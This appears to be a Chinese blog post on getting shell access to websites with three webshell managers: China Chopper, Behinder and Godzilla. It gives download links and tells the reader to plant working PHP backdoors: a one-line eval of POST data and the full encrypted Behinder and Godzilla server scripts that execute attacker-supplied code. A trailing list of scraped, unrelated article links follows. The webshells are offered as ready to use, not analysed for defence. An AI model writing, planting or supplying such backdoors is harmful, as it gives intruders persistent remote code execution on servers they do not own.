中国菜刀

下载链接
https://github.com/raddyfiy/caidao-official-version
下载后校验MD5值

certutil -hashfile caidao.exe MD5


与文档进行比对

(chopper.exe)md5各版本校验码(仅exe主程序): 20111116 => 5001ef50c7e869253a7c152a638eab8a20141213 => 4b4a956b9c7dc734f339fa05e4c2a99020160620 - ac86066ffd58779f4c0db5030574b0cb20160622 - acaf6564637ba97f73297b0096c2994c    #修复了mysql乱码20160622配置文件caidao.conf - > 4ed9e48fcfc0119a0f47ea89db6cd6ab更早:20111116 => 5001ef50c7e869253a7c152a638eab8a随GMT日期改变的动态密码,用法请注意看readme.txt20111022 => 7876d05ed4ee02967afc44a936186d2eCustomize模式的C#服务端增加了数据库管理功能...20110811 => 854bb49a84ce784ad70da7fd356d4f49ASP.NET的上传部分Bug修复, 另写了一个Customize模式的C#服务端20110806 => 4c8bc36c41151170f701f755ef700916修复一些BUG20110710 => d89c5957a1dc72bb229be070635e19b2解决确认对话框返回值不正确的BUG。20110707 => ec66b85fba3a8b7d1a41910ae5239b24解决浏览器新标签页打开BUG。20110703 => 3a8140e8e124326388cb13e6d9d0d4b5配置里添了几个选项:默认终端程序路径设置示例:<SHELL>/bin/sh</SHELL>虚拟终端默认命令设置示例:<CMD>whoami</CMD>文件管理默认打开的目录设置示例:<CD>c:\windows\temp\</CD>20110630 => 7e6c415ca57e6ecaa6c61147a2549477数据库导入,自写脚本编码后再提交,修复浏览器小BUG,其它。网站开通自写脚本分享栏目,脚本编码规范可以看下载的示例。20110628 => 60b49098d099ad01c3d80a5f794d4ebdPHP连接MySQL加了个<L></L>选项,用来设置数据库的字符集;自写脚本可在浏览器里执行了,示例请看 Script/phpspy2011.ccc;解决目录文件过多时显示慢的问题;因为缓存库读取有了变化,本次更新后最好清空一下缓存库。可以下载ip.dat放到菜刀的目录,用来显示网站的国别。使用时的有问题可以给我发邮件。20100928 => c05d44dbe353525f492208d891b53875界面调整,修正了一些BUG,加了个ColdFusion版的示例服务端(仅文件管理和虚拟终端,MX 7及以下版本修改文件时间功能不可用)20100812 => 4398e87939edb8573c44592942dca503重大更新,从这个版本起,菜刀开放接口,支持所有的动态脚本,服务端可按需自定义。写了个jsp的服务端(文件管理/虚拟终端/数据库管理),其它服务端可根据接口自个写!

确认无后门,安装完成
开始使用,这个工具类似于中国蚁剑,用于连接一句话木马getshell
左边写路径,右边写密码即可,文件内容为<?php @eval($_POST[1]);?>

冰蝎

下载链接
https://github.com/rebeyond/Behinder/releases
创建shell文件,内容为冰蝎自带的那个shell.php即可,如下所示

<?php
@error_reporting(0);
session_start();$key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond$_SESSION['k']=$key;session_write_close();$post=file_get_contents("php://input");if(!extension_loaded('openssl')){$t="base64_"."decode";$post=$t($post."");for($i=0;$i<strlen($post);$i++) {$post[$i] = $post[$i]^$key[$i+1&15]; }}else{$post=openssl_decrypt($post, "AES128", $key);}$arr=explode('|',$post);$func=$arr[0];$params=$arr[1];class C{public function __invoke($p) {eval($p."");}}@call_user_func(new C(),$params);
?>


哥斯拉

下载地址
https://github.com/BeichenDream/Godzilla/releases
shell内容如下

<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){for($i=0;$i<strlen($D);$i++) {$c = $K[$i+1&15];$D[$i] = $D[$i]^$c;}return $D;
}
$pass='verter';
$payloadName='payload';
$key='cb42e130d1471239';
if (isset($_POST[$pass])){$data=encode(base64_decode($_POST[$pass]),$key);if (isset($_SESSION[$payloadName])){$payload=encode($_SESSION[$payloadName],$key);eval($payload);echo substr(md5($pass.$key),0,16);echo base64_encode(encode(@run($data),$key));echo substr(md5($pass.$key),16);}else{if (stripos($data,"getBasicsInfo")!==false){$_SESSION[$payloadName]=encode($data,$key);}}
}

连接

常用getshell工具的下载相关推荐

  1. CTF常用脚本工具(附下载地址)

    该项目主要记录CTF中用到的工具 Base base64解码输出字节文本 base64隐写加密与解密 base64连续解码 Base64扩展 base64字符替换表 B64-B32-B16解密 b16 ...

  2. Linux系列讲解 —— 常用小工具下载

    常用工具系列 相关文章: Windows平台 常用开发工具下载 putty,Android Studio,Visual Studio Code,git,Visual Paradigm社区版 Ubunt ...

  3. 常用开发工具 之 SQLite 数据库 与 Navicat for SQLite 的下载、安装与简单使用说明

    常用开发工具 之 SQLite 数据库 与 Navicat for SQLite 的下载.安装与简单使用说明 目录 常用开发工具 之 SQLite 数据库 与 Navicat for SQLite 的 ...

  4. Windows平台 常用开发工具下载

    常用工具系列 相关文章: Windows平台 常用开发工具下载 putty,Android Studio,Visual Studio Code,git,Visual Paradigm社区版 Ubunt ...

  5. 我的常用在线工具网站

    小伙伴们大家好,本期再托一次家底,和大家分享十几个自己日常工作学习过程中的常用在线工具和网站,希望能有帮助. 也欢迎小伙伴们分享和安利出你们觉得有用的工具,不要停啊. 本文 Github 开源项目:g ...

  6. 华为网络技术培训笔记之常用网络工具(二)

    TFTP使用 TFTP Server是路由器文件管理系统常用的工具软件,用于VRP路由器软件.配置文件的上.下载. TFTP在路由器升级中的实际应用. 1.  先启动FTFP服务 2.  将需要加载的 ...

  7. Java新手看招 常用开发工具介绍

    Java新手看招 常用开发工具介绍 Java的应用越来越广泛,学习Java的人也越来越多.学过程序设计的人知道,使用Basic进行程序设计,可以使用QBasic.Visual Basic等开发工具:使 ...

  8. 工作中常用,实用工具推荐!

    原文:工作中常用,实用工具推荐! Red Gate 家族 大名鼎鼎的RedGate,相信大家都不会陌生,Reflector就是它家做的.这里就不介绍了.我本地安装的是09年下的一个套装,我介绍下常用的 ...

  9. 第二章 java常用开发工具以及程序的编写

    2019独角兽企业重金招聘Python工程师标准>>> 第二章 java常用开发工具以及程序的编写 1. 程序的概念         2. java程序的开发的三个步骤        ...

最新文章

  1. 《数据竞赛入门讲义》下载,北航计算机硕士两年经验总结
  2. 2851 菜菜买气球
  3. ExoPlayer 开发者指导
  4. App Store审核被拒的23个理由
  5. 【POJ2387】Til the Cows Come Home (最短路)
  6. vue页面跳转后返回原页面初始位置
  7. ubuntu安装pytorch镜像修改及下载
  8. 带有Prometheus的弹簧靴和Micrometer第5部分:旋转Prometheus
  9. 生成随机测试数据的文件的程序
  10. Webpack搭建React开发环境
  11. 如何成为一名架构师,架构师成长之路(转)
  12. Codeforces Round #313 (Div. 1) C. Gerald and Giant Chess DP
  13. 面向机器学习的特征工程 八、自动化特征提取器:图像特征提取和深度学习
  14. IT民工系列——c#控制Word的类库。对com操作进行了封装
  15. cvSaveImage用法
  16. Latex表格中内容过长换行方法
  17. 十、RD 虚拟主机配置(三)
  18. spring接收ajax参数的几种方式
  19. linux实验十shell程序设计,实验二Linux Shell编程.doc
  20. vs2015c 语言包,有关Visual Studio 2015 中文语言包 无法下载

热门文章

  1. 基于JSP的二手车拍卖网-java二手车拍卖系统
  2. 解决OSError: [Errno 98] Address already in use问题
  3. jgrid 多选 快捷键_Intellij IDEA史上最全快捷键大全
  4. css 鼠标沙漏,CSS3 沙漏动画
  5. 基于Volcano 3D游戏引擎开发一个类似魔兽世界的场景
  6. 2023届秋招进入最卷阶段!
  7. Simulink软件开发问题记录表
  8. 前端歌谣的刷题之路-第一百三十题-absolute
  9. 投票作弊程序制作思路(续)——突破IP限制投票
  10. 【愚公系列】2021年12月 攻防世界-简单题-REVERSE-001(Hello, CTF)